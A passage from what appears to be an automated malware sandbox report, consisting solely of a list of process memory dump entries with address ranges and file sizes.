                                                                                                        Filesize

                                                                                                        120KB

                                                                                                      • memory/4000-353-0x0000000005C50000-0x0000000005C51000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4000-369-0x0000000005640000-0x0000000005C46000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.0MB

                                                                                                      • memory/4156-218-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4160-323-0x0000000000780000-0x0000000000781000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4160-334-0x0000000004F20000-0x0000000004F96000-memory.dmp
                                                                                                        Filesize

                                                                                                        472KB

                                                                                                      • memory/4160-306-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4188-436-0x0000000005110000-0x0000000005716000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.0MB

                                                                                                      • memory/4188-405-0x000000000041883A-mapping.dmp
                                                                                                      • memory/4228-222-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4252-368-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4288-293-0x0000000000A10000-0x0000000000A1A000-memory.dmp
                                                                                                        Filesize

                                                                                                        40KB

                                                                                                      • memory/4288-295-0x0000000000A20000-0x0000000000A22000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4288-226-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4288-301-0x0000000000BC0000-0x0000000000BC1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4288-230-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4316-441-0x0000000002ED0000-0x00000000037F6000-memory.dmp
                                                                                                        Filesize

                                                                                                        9.1MB

                                                                                                      • memory/4316-292-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4316-443-0x0000000000400000-0x0000000000D41000-memory.dmp
                                                                                                        Filesize

                                                                                                        9.3MB

                                                                                                      • memory/4424-449-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4492-437-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                        Filesize

                                                                                                        36KB

                                                                                                      • memory/4492-430-0x0000000000402E1A-mapping.dmp
                                                                                                      • memory/4532-237-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4552-438-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4628-316-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                        Filesize

                                                                                                        340KB

                                                                                                      • memory/4628-311-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4648-457-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4684-289-0x00000000052E0000-0x00000000052E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4684-270-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4684-244-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4684-278-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4684-267-0x00000000008C0000-0x00000000008C1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4760-269-0x0000000000DF0000-0x0000000000DF1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4760-271-0x00000000011D0000-0x00000000011EC000-memory.dmp
                                                                                                        Filesize

                                                                                                        112KB

                                                                                                      • memory/4760-261-0x0000000000CA0000-0x0000000000CA1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4760-286-0x000000001B8D0000-0x000000001B8D2000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4760-250-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4760-273-0x00000000011F0000-0x00000000011F1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4792-265-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                        Filesize

                                                                                                        340KB

                                                                                                      • memory/4792-255-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4812-349-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4820-256-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4900-426-0x0000000000400000-0x0000000000901000-memory.dmp
                                                                                                        Filesize

                                                                                                        5.0MB

                                                                                                      • memory/4900-313-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4900-410-0x0000000000BB0000-0x0000000000C4D000-memory.dmp
                                                                                                        Filesize

                                                                                                        628KB

                                                                                                      • memory/4940-400-0x0000000005420000-0x0000000005421000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4940-344-0x0000000000000000-mapping.dmp
                                                                                                      • memory/4940-382-0x0000000076EB0000-0x000000007703E000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.6MB

                                                                                                      • memory/5008-433-0x0000000000470000-0x000000000051E000-memory.dmp
                                                                                                        Filesize

                                                                                                        696KB

                                                                                                      • memory/5008-342-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5024-448-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5040-309-0x0000000000E80000-0x0000000000E81000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5040-322-0x0000000005880000-0x0000000005881000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5040-332-0x0000000005D90000-0x0000000005D91000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5040-275-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5048-274-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5048-288-0x0000000000E60000-0x0000000000E61000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5048-387-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5048-339-0x00000000030F0000-0x00000000030FE000-memory.dmp
                                                                                                        Filesize

                                                                                                        56KB

                                                                                                      • memory/5048-308-0x0000000005840000-0x0000000005841000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5060-446-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5068-329-0x00000000016E0000-0x00000000016E1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5068-317-0x00000000016A0000-0x00000000016A1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5068-276-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5068-300-0x0000000000F80000-0x0000000000F81000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5068-321-0x000000001BC20000-0x000000001BC22000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/5068-325-0x00000000016B0000-0x00000000016D3000-memory.dmp
                                                                                                        Filesize

                                                                                                        140KB

                                                                                                      • memory/5080-394-0x0000000004B32000-0x0000000004B33000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5080-417-0x0000000004B30000-0x0000000004B31000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5080-391-0x0000000000490000-0x00000000004BF000-memory.dmp
                                                                                                        Filesize

                                                                                                        188KB

                                                                                                      • memory/5080-397-0x0000000000400000-0x000000000047C000-memory.dmp
                                                                                                        Filesize

                                                                                                        496KB

                                                                                                      • memory/5080-277-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5080-419-0x0000000004B33000-0x0000000004B34000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5080-423-0x0000000004B34000-0x0000000004B36000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/5112-314-0x0000000000B60000-0x0000000000B61000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5112-333-0x0000000000B50000-0x0000000000B5E000-memory.dmp
                                                                                                        Filesize

                                                                                                        56KB

                                                                                                      • memory/5112-296-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5112-279-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5112-384-0x0000000000000000-mapping.dmp